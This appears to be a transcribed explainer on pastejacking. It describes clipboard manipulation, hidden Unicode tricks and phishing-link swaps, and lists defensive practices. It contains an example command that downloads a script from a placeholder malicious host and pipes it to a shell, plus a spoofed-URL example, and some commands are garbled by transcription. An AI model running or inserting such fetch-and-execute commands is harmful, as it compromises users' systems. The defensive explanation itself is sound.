Pastejacking is a dangerous cyber attack that exploits the simple act of copy-pasting to compromise your system, steal sensitive data, or execute malicious commands without your knowledge. At first glance, copying and pasting text seems harmless, whether it's a command from a tutorial, a code snippet from a forum, or a link shared by a colleague. However, hackers have developed sophisticated techniques to manipulate clipboard contents, turning this everyday action into a severe security vulnerability. The attack works by secretly altering what you paste, replacing seemingly harmless text with malicious scripts, commands, or links the moment you execute the paste operation. For example, you might copy what appears to be an innocent terminal command like sudo apt update, but when you paste it, the attacker's script silently changes it to sudo apt update and curl http://malicious-site.com/install.sh /bash, triggering an unauthorized download and execution of malware. This type of attack is particularly effective because it bypasses traditional security measures. Users don't see the malicious payload until it's too late, and by then, the damage may already be done. Pastejacking attacks often target developers, system administrators, and technical users who frequently copy-paste commands into terminals, code editors, or configuration files. Attackers embed malicious scripts in websites, forums, or even documentation, knowing that users trust these sources. One common method involves JavaScript-based clipboard hijacking, where a website silently modifies your clipboard when you copy text from it. Modern browsers restrict some clipboard access for security, but attackers bypass these restrictions using social engineering, such as prompting users to click a fake copy button that triggers the malicious script. Another variant is the invisible Unicode attack, where hackers insert hidden characters into copied text, altering its behavior when pasted into a terminal or script. For instance, a command might include an invisible right-to-left override character, reversing the order of text, and disguising malicious code as harmless. These attacks are especially dangerous because they exploit the trust users place in familiar workflows, making them difficult to detect without careful scrutiny. The consequences of falling victim to pastejacking can be severe. If a malicious command executes in a terminal with administrative privileges, for example using sudo on Linux or run as administrator on Windows, the attacker could gain full control over the system, install backdoors, exfiltrate sensitive data, or deploy ransomware. In a corporate environment, a single compromised machine could serve as a foothold for lateral movement across the network, leading to widespread breaches. Even non-administrative users are at risk. Pasting manipulated code into a development environment could introduce vulnerabilities, leak API keys, or trigger unintended actions in applications. Beyond terminal commands, pastejacking can also alter URLs, redirecting users to phishing sites that steal login credentials or deliver exploit kits. For example, you might copy a legitimate-looking link like https://github.com/trusted-project. But when pasted, it becomes https://github.com.fake-site.com/steal-data. leading to a spoofed page designed to harvest your credentials. Defending against pastejacking requires a combination of technical safeguards and user awareness. One of the simplest, yet most effective precautions is to manually inspect pasted text before executing it. When pasting into a terminal, use Echo or a text editor first to reveal the actual content. For example, instead of pasting directly, run echo pasted content to see if the command matches what you copied. On Windows, the Showkeys utility can help detect hidden keystrokes or malicious alterations. Disabling automatic command execution in terminals, for example avoiding curl vertical bar bash patterns, and using package managers or verified scripts reduces risk. Browser extensions like don't f*** with paste can prevent websites from manipulating clipboard data, while security-focused tools like NoScript or uMatrix block unauthorized JavaScript execution. Developers should also adopt secure coding practices, such as input validation and checksum verification for scripts, to prevent unintended execution. For system administrators, implementing least privilege access ensures that even if a malicious command runs, its impact is limited. Regular audits of command history logs, write single quote ~bash _ history write single quote on Linux, can help detect unauthorized actions. Network-level protections, such as firewalls blocking outbound connections to unknown domains, mitigate data exfiltration. Enterprises should educate employees about pastejacking risks through security training, emphasizing the dangers of blind copy-pasting from untrusted sources. Some modern terminals, like Windows Terminal or iTerm2, offer warnings when pasting multi-line commands, giving users a chance to review before execution. Additionally, using virtual machines or sandboxed environments for testing unknown commands adds an extra layer of isolation. The rise of pastejacking highlights a broader issue in cybersecurity: the exploitation of trust in everyday actions. As attackers grow more sophisticated, users must adopt a zero-trust mindset, verifying even seemingly benign actions like copy-pasting. Open-source projects and communities can help by curating trusted repositories and signing scripts with cryptographic signatures to ensure integrity. Future operating systems and browsers may integrate deeper clipboard protections, such as read-only modes or visual alerts for modified content. Until then, vigilance remains the best defense. By understanding how pastejacking works and adopting secure practices, users can protect themselves from this stealthy yet devastating attack, ensuring that a simple copy-paste doesn't become the weakest link in their security chain.